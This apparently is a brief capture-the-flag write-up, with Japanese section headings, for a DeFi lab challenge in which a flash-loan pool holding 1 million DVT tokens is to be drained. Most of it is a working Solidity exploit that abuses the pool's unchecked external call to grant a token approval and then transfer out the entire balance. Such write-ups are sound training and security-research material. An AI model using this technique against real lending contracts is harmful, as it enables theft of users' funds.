答えを理解する
絞る
引数を理解する
In this case, a new pool has launched offering free flash loans of DVT tokens.
Currently the pool has 1 million DVT tokens in balance. And you have nothing.
But don't worry, you might be able to steal them all from the pool.
(bool success, ) = target.call(data);
require(success, "External call failed");
function attack(IERC20 token, ITrusterLenderPool pool, address attackerEOA)
public
{
uint256 poolBalance = token.balanceOf(address(pool));
// IERC20::approve(address spender, uint256 amount)
// flashloan executes "target.call(data);", approve our contract to withdraw all liquidity
bytes memory approvePayload = abi.encodeWithSignature("approve(address,uint256)", address(this), poolBalance);
pool.flashLoan(0, attackerEOA, address(token), approvePayload);
// once approved, use transferFrom to withdraw all pool liquidity
token.transferFrom(address(pool), attackerEOA, poolBalance);
}